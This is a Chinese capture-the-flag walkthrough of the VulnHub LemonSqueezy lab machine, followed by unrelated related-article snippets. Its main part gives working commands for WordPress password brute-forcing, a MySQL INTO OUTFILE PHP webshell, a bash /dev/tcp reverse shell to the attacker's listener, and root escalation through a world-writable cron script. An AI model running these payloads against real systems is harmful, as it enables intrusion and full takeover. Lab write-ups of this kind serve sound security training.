【LEMONSQUEEZY: 1【mysql写shell】】

前期环境准备

靶机下载地址
https://vulnhub.com/entry/lemonsqueezy-1%2C473/

在这里插入图片描述

信息收集

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nmap -sP 192.168.47.1/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-20 14:02 CST
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 4 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.47.1
Host is up (0.00061s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.00010s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.177
Host is up (0.00012s latency).
MAC Address: 00:0C:29:E2:78:CF (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.000075s latency).
MAC Address: 00:50:56:FD:24:81 (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 8.43 seconds

靶机ip为

192.168.47.177

进行全面端口探测,看开放了哪些端口和服务

──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nmap -p- 192.168.47.177 -A -T4 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-20 14:03 CST
Nmap scan report for 192.168.47.177
Host is up (0.00021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:E2:78:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hopTRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.47.177OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds

只开放了http服务,很有限
是apache的默认页面
在这里插入图片描述
尝试一下是否存在robots.txt页面
手工基本探测不存在
扫描一下

dirb 目录扫描

dirb用小字典进行扫描一下(特点是先广度后深度的扫描)

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# dirb http://192.168.47.177/ /usr/share/wordlists/dirb/small.txt -----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Wed Mar 20 14:06:54 2024
URL_BASE: http://192.168.47.177/
WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt-----------------GENERATED WORDS: 959                                                           ---- Scanning URL: http://192.168.47.177/ ----
==> DIRECTORY: http://192.168.47.177/javascript/                                                                                                       
==> DIRECTORY: http://192.168.47.177/manual/                                                                                                           
==> DIRECTORY: http://192.168.47.177/phpmyadmin/                                                                                                       
==> DIRECTORY: http://192.168.47.177/wordpress/                                                                                                        ---- Entering directory: http://192.168.47.177/javascript/ -------- Entering directory: http://192.168.47.177/manual/ ----
==> DIRECTORY: http://192.168.47.177/manual/en/                                                                                                        
==> DIRECTORY: http://192.168.47.177/manual/es/                                                                                                        
==> DIRECTORY: http://192.168.47.177/manual/images/                                                                                                    
==> DIRECTORY: http://192.168.47.177/manual/style/                                                                                                     ---- Entering directory: http://192.168.47.177/phpmyadmin/ ----
==> DIRECTORY: http://192.168.47.177/phpmyadmin/doc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/phpmyadmin/js/                                                                                                    
==> DIRECTORY: http://192.168.47.177/phpmyadmin/libraries/                                                                                             
==> DIRECTORY: http://192.168.47.177/phpmyadmin/setup/                                                                                                 
==> DIRECTORY: http://192.168.47.177/phpmyadmin/sql/                                                                                                   
==> DIRECTORY: http://192.168.47.177/phpmyadmin/templates/                                                                                             ---- Entering directory: http://192.168.47.177/wordpress/ -------- Entering directory: http://192.168.47.177/manual/en/ ----
==> DIRECTORY: http://192.168.47.177/manual/en/misc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/manual/en/ssl/                                                                                                    ---- Entering directory: http://192.168.47.177/manual/es/ ----
==> DIRECTORY: http://192.168.47.177/manual/es/misc/                                                                                                   
==> DIRECTORY: http://192.168.47.177/manual/es/ssl/                                                                                                    ---- Entering directory: http://192.168.47.177/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.47.177/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.47.177/phpmyadmin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.47.177/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.47.177/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.47.177/phpmyadmin/setup/ ----
==> DIRECTORY: http://192.168.47.177/phpmyadmin/setup/lib/                                                                                             ---- Entering directory: http://192.168.47.177/phpmyadmin/sql/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.47.177/phpmyadmin/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.47.177/manual/en/misc/ -------- Entering directory: http://192.168.47.177/manual/en/ssl/ -------- Entering directory: http://192.168.47.177/manual/es/misc/ -------- Entering directory: http://192.168.47.177/manual/es/ssl/ -------- Entering directory: http://192.168.47.177/phpmyadmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)-----------------
END_TIME: Wed Mar 20 14:07:04 2024
DOWNLOADED: 11508 - FOUND: 0┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

找到几个目录

==> DIRECTORY: http://192.168.47.177/javascript/                                                                                                       
==> DIRECTORY: http://192.168.47.177/manual/                                                                                                           
==> DIRECTORY: http://192.168.47.177/phpmyadmin/                                                                                                       
==> DIRECTORY: http://192.168.47.177/wordpress/     

访问/manual是apache的默认手册页面
在这里插入图片描述

访问/phpmyadmin
需要账号密码
在这里插入图片描述

访问/wordpress

在这里插入图片描述

wpscan扫描

这里首先从抓个wordpress进行入手
因为有专门的扫描工具
http://192.168.47.177/wordpress/

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.22@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] Updating the Database ...
[i] Update completed.[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:11:45 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.25 (Debian)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).| Found By: Emoji Settings (Passive Detection)|  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'| Confirmed By: Meta Generator (Passive Detection)|  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'[i] The main theme could not be detected.[+] Enumerating All Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods)Checking Config Backups - Time: 00:00:00 <=========================================================================> (137 / 137) 100.00% Time: 00:00:00[i] No Config Backups Found.[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Wed Mar 20 14:11:50 2024
[+] Requests Done: 180
[+] Cached Requests: 4
[+] Data Sent: 46.925 KB
[+] Data Received: 21.056 MB
[+] Memory used: 223.922 MB
[+] Elapsed time: 00:00:05

可以得到一些信息
枚举一下用户

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/ -e u         
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.22Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:20:28 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.25 (Debian)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).| Found By: Emoji Settings (Passive Detection)|  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'| Confirmed By: Meta Generator (Passive Detection)|  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'[i] The main theme could not be detected.[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] orange| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] lemon| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Wed Mar 20 14:20:28 2024
[+] Requests Done: 14
[+] Cached Requests: 41
[+] Data Sent: 3.992 KB
[+] Data Received: 11.639 KB
[+] Memory used: 161.723 MB
[+] Elapsed time: 00:00:00┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

有两个用户

orange
lemon

尝试爆破用户密码

爆破出一个用户的密码

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# wpscan --url http://192.168.47.177/wordpress/ -e u -P /usr/share/wordlists/rockyou.txt   
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.22Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://192.168.47.177/wordpress/ [192.168.47.177]
[+] Started: Wed Mar 20 14:25:39 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.25 (Debian)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.47.177/wordpress/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.47.177/wordpress/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.47.177/wordpress/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.47.177/wordpress/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).| Found By: Emoji Settings (Passive Detection)|  - http://192.168.47.177/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'| Confirmed By: Meta Generator (Passive Detection)|  - http://192.168.47.177/wordpress/, Match: 'WordPress 4.8.9'[i] The main theme could not be detected.[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] orange| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] lemon| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - orange / ginger                                                                                                                             
^Cying lemon / money Time: 00:00:06 <                                                                           > (875 / 28688947)  0.00%  ETA: 56:22:35
[!] Valid Combinations Found:| Username: orange, Password: ginger[!] No WPScan API Token given, as a result vulnerability data has not been output.                              > (880 / 28688947)  0.00%  ETA: 56:21:29
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Wed Mar 20 14:25:48 2024
[+] Requests Done: 900
[+] Cached Requests: 42
[+] Data Sent: 483.302 KB
[+] Data Received: 545.76 KB
[+] Memory used: 153.785 MB
[+] Elapsed time: 00:00:09Scan Aborted: Canceled by User┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# 

尝试登录这两个系统
wordpress和phpmyadmin
orange / ginger

在这里插入图片描述

成功登录,但是功能点很少,应该不是管理员用户

phpmyadmin登录不进去

信息收集中得到下面这个很像密码的字符串
n0t1n@w0rdl1st!
在这里插入图片描述

尝试登录phpmyadmin
在这里插入图片描述

成功登录!

在这里插入图片描述
这里可以直接覆盖lemmon的hash值,因为已经知道了orange的密码
在这里插入图片描述
成功登录lemmon
在这里插入图片描述

phpmyadmin写shell

本来想从这个后台入手的,但是phpmyadmin如果有写入的权限,直接就可以写入shell了

直接写入apache的默认路径,没有权限
在这里插入图片描述

那wordpress的呢?

select '<?php phpinfo();system($_GET[1]); into outfile '/var/www/html/wordpress/1.php'?>'

在这里插入图片描述

成功getshell
在这里插入图片描述

反弹shell

然后是反弹shell
在这里插入图片描述

bash -c "bash -i >& /dev/tcp/192.168.47.156/9999 0>&1"

防止&的影响url编码一下
在这里插入图片描述

反弹shell成功
在这里插入图片描述

升级一下shell

┌──(root㉿kali)-[/home/test/桌面/lemmon]
└─# nc -lvvp 9999                                 
listening on [any] 9999 ...
192.168.47.177: inverse host lookup failed: Unknown host
connect to [192.168.47.156] from (UNKNOWN) [192.168.47.177] 45450
bash: cannot set terminal process group (557): Inappropriate ioctl for device
bash: no job control in this shell
www-data@lemonsqueezy:/var/www/html/wordpress$ tty
tty
not a tty
www-data@lemonsqueezy:/var/www/html/wordpress$ which python
which python
/usr/bin/python
www-data@lemonsqueezy:/var/www/html/wordpress$ python -c "import pty;pty.spawn('/bin/bash')"
<ress$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@lemonsqueezy:/var/www/html/wordpress$ tty
tty
/dev/pts/0
www-data@lemonsqueezy:/var/www/html/wordpress$ export TERM=xterm
export TERM=xterm
www-data@lemonsqueezy:/var/www/html/wordpress$ clear

升级tty,设置清屏

是否有suid提权

www-data@lemonsqueezy:/var/www/html/wordpress$ find / -perm -4000 -type f 2>/dev/null
/null/ -perm -4000 -type f 2>/dev/
/usr/sbin/pppd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/ping
/bin/mount
/bin/fusermount

得到用户flag,在/var/www目录下

cd www
www-data@lemonsqueezy:/var/www$ ls
ls
html  user.txt
www-data@lemonsqueezy:/var/www$ cat user.txt
cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
www-data@lemonsqueezy:/var/www$ echo 'TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH' | base64 -d
base64 -dzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH' | b
Music can change your life, base64: invalid input
www-data@lemonsqueezy:/var/www$ 

计划任务提权

查看一下计划任务

www-data@lemonsqueezy:/var/www$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate
#

多出来一个
/etc/logrotate.d/logrotate

看一下这个程序的权限,如果是777的话,那就是所有用户都可以编辑,就可以以root身份运行

在这里插入图片描述

真的是777,那这样就可以直接编辑提权了

先备份这个文件

www-data@lemonsqueezy:/etc/logrotate.d$ cp logrotate /var/www/html/wordpress/logrotate.bak
rotate.bakte /var/www/html/wordpress/logr
www-data@lemonsqueezy:/etc/logrotate.d$ echo 'chmod +s /bin/bash' >> logrotate
echo 'chmod +s /bin/bash' >> logrotate
www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
#!/usr/bin/env python
import os
import sys
try:os.system('rm -r /tmp/* ')
except:sys.exit()
chmod +s /bin/bash
www-data@lemonsqueezy:/etc/logrotate.d$ ls -la /bin/bash
ls -la /bin/bash
-rwxr-xr-x 1 root root 1099016 May 16  2017 /bin/bash

直接添加,会有其他数据的影响,还是直接覆盖试一下

www-data@lemonsqueezy:/etc/logrotate.d$ echo 'chmod +s /bin/bash ' > logrotate
echo 'chmod +s /bin/bash ' > logrotate
www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
chmod +s /bin/bash 
www-data@lemonsqueezy:/etc/logrotate.d$ ls -al /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 1099016 May 16  2017 /bin/bash

变化
在这里插入图片描述

直接提权

www-data@lemonsqueezy:/etc/logrotate.d$ bash -p
bash -p
bash-4.4# whoami
whoami
root
bash-4.4# pwd
pwd
/etc/logrotate.d
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
root.txt
bash-4.4# cat root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
bash-4.4# 

至此这个靶机复现就结束了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/757907.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

关于layui如何动态更新数据

因为在写项目时用layui来完成后台&#xff0c;想点击下一页或者对于下拉切换数据的条数&#xff0c;然后一开始没注意它的table.render里面的url&#xff0c;&#xff08;不是没注意吧&#xff0c;就是没看到await等明显的请求方式&#xff0c;就以为它只能请求JSON文件里面的数…

ATG-2081功率信号源在电子实验中的应用

功率信号源被广泛应用于电子实验领域&#xff0c;主要用于产生精确、干净的高频信号。这些信号可以被用于测试各种电子器件和电路&#xff0c;例如射频、微波电路和天线等。下面将介绍功率信号源在电子实验中的应用。 功率信号源可以产生稳定、高质量的RF和微波信号&#xff0c…

【Maven入门篇】(3)依赖配置,依赖传递,依赖范围,生命周期

&#x1f38a;专栏【Maven入门篇】 &#xfeff;> &#x1f354;喜欢的诗句&#xff1a;更喜岷山千里雪 三军过后尽开颜。 &#xfeff;> &#x1f386;音乐分享【The truth that you leave】 &#xfeff;> &#x1f970;欢迎并且感谢大家指出我的问题 文章目录 &…

【译】矢量数据库 101 - 什么是矢量数据库?

原文地址&#xff1a;Vector Database 101 - What is a Vector Database? 1. 简介 大家好——欢迎回到 Milvus 教程。在上一教程中&#xff0c;我们快速浏览了每天产生的日益增长的数据量。然后&#xff0c;我们介绍了如何将这些数据分成结构化/半结构化数据和非结构化数据&…

【学习】CMMI评估认证的意义和需要注意的问题

​ CMMI认证是软件能力成熟度集成模型&#xff0c;是软件行业中的一种质量管理体系&#xff0c;旨在评估软件开发组织的成熟度和能力&#xff0c;以帮助企业提高软件质量、降低成本、控制风险&#xff0c;并获得更好的商业效益。 一、CMMI评估认证的意义 1. 提高软件质量&am…

GAMES101 学习3

Lecture 13 ~ 16 Shadow mapping 一种图像空间算法生成阴影时不需要知道场景中的几何信息会产生走样现象 最重要的思想&#xff1a;如果有的点不在阴影里你又能看到这个点&#xff0c;那么说明摄像机可以看到这个点&#xff0c;光源也可以看到这个点 经典的Shadow mapping …

Linux-docker安装数据库mysql

1、拉去mysql镜像&#xff1a; docker pull mysql2、创建容器挂载路径 mkdir -p /usr/local/jiuxiang/mysql/data # 数据存储位置 mkdir -p /usr/local/jiuxiang/mysql/logs # 日志存储位置 mkdir -p /usr/local/jiuxiang/mysql/conf # 配置文件3、启动容器 docker run -…

数据结构 之 二叉树

&#x1f389;欢迎大家观看AUGENSTERN_dc的文章(o゜▽゜)o☆✨✨ &#x1f389;感谢各位读者在百忙之中抽出时间来垂阅我的文章&#xff0c;我会尽我所能向的大家分享我的知识和经验&#x1f4d6; &#x1f389;希望我们在一篇篇的文章中能够共同进步&#xff01;&#xff01;&…

Transformer在计算机视觉中的应用-VIT、TNT模型

Transformer是传统机器翻译模型中常见的seq2seq网络&#xff0c;里面加入了注意力机制&#xff0c;QKV矩阵的运算使得计算并行。 当然&#xff0c;最大的重点不是矩阵运算&#xff0c;而是注意力机制的出现。 一、CNN最大的问题是什么 CNN依旧是十分优秀的特征提取器&#xf…

CSS中如何设置单行或多行内容超出后,显示省略号

1. 设置超出显示省略号 css设置超出显示省略号可分两种情况&#xff1a; 单行文本溢出显示省略号…多行文本溢出显示省略号… 但使用的核心代码是一样的&#xff1a;需要先使用 overflow:hidden;来把超出的部分隐藏&#xff0c;然后使用text-overflow:ellipsis;当文本超出时…

idea如何复制一个module

选中要复制的模块&#xff0c;按ctrl C 然后按ctrl V&#xff0c;会出来一个对话框&#xff0c;输入复制后的项目名称&#xff0c;这里随便写。 路径就选择的当前路径&#xff0c;点击OK 打开project structure 选择modules&#xff0c;点击加号 弹出一个对话框&#xff0c…

Linux——程序地址空间

我们先来看这样一段代码&#xff1a; #include <stdio.h> #include <unistd.h> #include <stdlib.h>int g_val 0;int main() {pid_t id fork();if(id < 0){perror("fork");return 0;}else if(id 0){ //child,子进程肯定先跑完&#xff0c;也…

生成单一c段或者连续c段范围内的所有ip地址+生成范围内C段脚本

1. 背景 马上有电子政务外网攻防演练要处理ip 2. 脚本1 生成c段和连续c段所有ip地址.py 用处&#xff1a;生成单一c段或者连续c段范围内的所有ip地址。 用法&#xff1a;ipc.txt 放入 ip段或者两个ip段范围&#xff1a;如&#xff1a; 192.168.3.0/24 172.16.1.0/24-1…

Sora 发布的意义能和 ChatGPT 相比吗?

个人觉得&#xff0c;Sora 的发布弥补了ChatGPT语言模型在视频内容领域的不足&#xff0c;简单来说&#xff0c;这两个模型均有自己的优势&#xff0c;ChatGPT是一种语言模型&#xff0c;可以理解和解释自然语言&#xff0c;而Sora是文字到视频转化的应用&#xff0c;将文本内容…

【进阶五】Python实现SDVRP(需求拆分)常见求解算法——差分进化算法(DE)

基于python语言&#xff0c;采用经典差分进化算法&#xff08;DE&#xff09;对 需求拆分车辆路径规划问题&#xff08;SDVRP&#xff09; 进行求解。 目录 往期优质资源1. 适用场景2. 代码调整3. 求解结果4. 代码片段参考 往期优质资源 经过一年多的创作&#xff0c;目前已经成…

保护王国的钥匙:探索特权访问管理 (PAM) 的深度

在零信任架构的范例中&#xff0c;特权访问管理&#xff08;PAM&#xff09;正在成为网络安全策略的关键组成部分&#xff0c;旨在控制和监控组织内的特权访问。本文深入探讨了 PAM 在现代网络安全中的关键作用&#xff0c;探讨了其原理、实施策略以及特权访问的演变格局。 什么…

告别卡顿,CleanMyMac X让你的Mac跑得更快更稳!

CleanMyMac X是一款专业的Mac清理软件&#xff0c;具备智能扫描、恶意软件检测和清除、应用程序管理等全面的功能特点&#xff0c;可以智能清理Mac磁盘垃圾和多余语言安装包&#xff0c;快速释放电脑内存&#xff0c;轻松管理和升级Mac上的应用。同时&#xff0c;它也能强力卸载…

「滚雪球学Java」:内存管理和垃圾回收(章节汇总)

咦咦咦&#xff0c;各位小可爱&#xff0c;我是你们的好伙伴——bug菌&#xff0c;今天又来给大家普及Java SE相关知识点了&#xff0c;别躲起来啊&#xff0c;听我讲干货还不快点赞&#xff0c;赞多了我就有动力讲得更嗨啦&#xff01;所以呀&#xff0c;养成先点赞后阅读的好…

Python内存管理与垃圾回收机制:深入理解与优化【第138篇—RESTful API】

&#x1f47d;发现宝藏 前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。【点击进入巨牛的人工智能学习网站】。 Python内存管理与垃圾回收机制&#xff1a;深入理解与优化 在Python编程中&#xff0c;内存…

稀碎从零算法笔记Day22-LeetCode:存在重复元素 II

题型&#xff1a;哈希表、数组 链接&#xff1a;219. 存在重复元素 II - 力扣&#xff08;LeetCode&#xff09; 来源&#xff1a;LeetCode 题目描述 给你一个整数数组 nums 和一个整数 k &#xff0c;判断数组中是否存在两个 不同的索引 i 和 j &#xff0c;满足 nums[i] …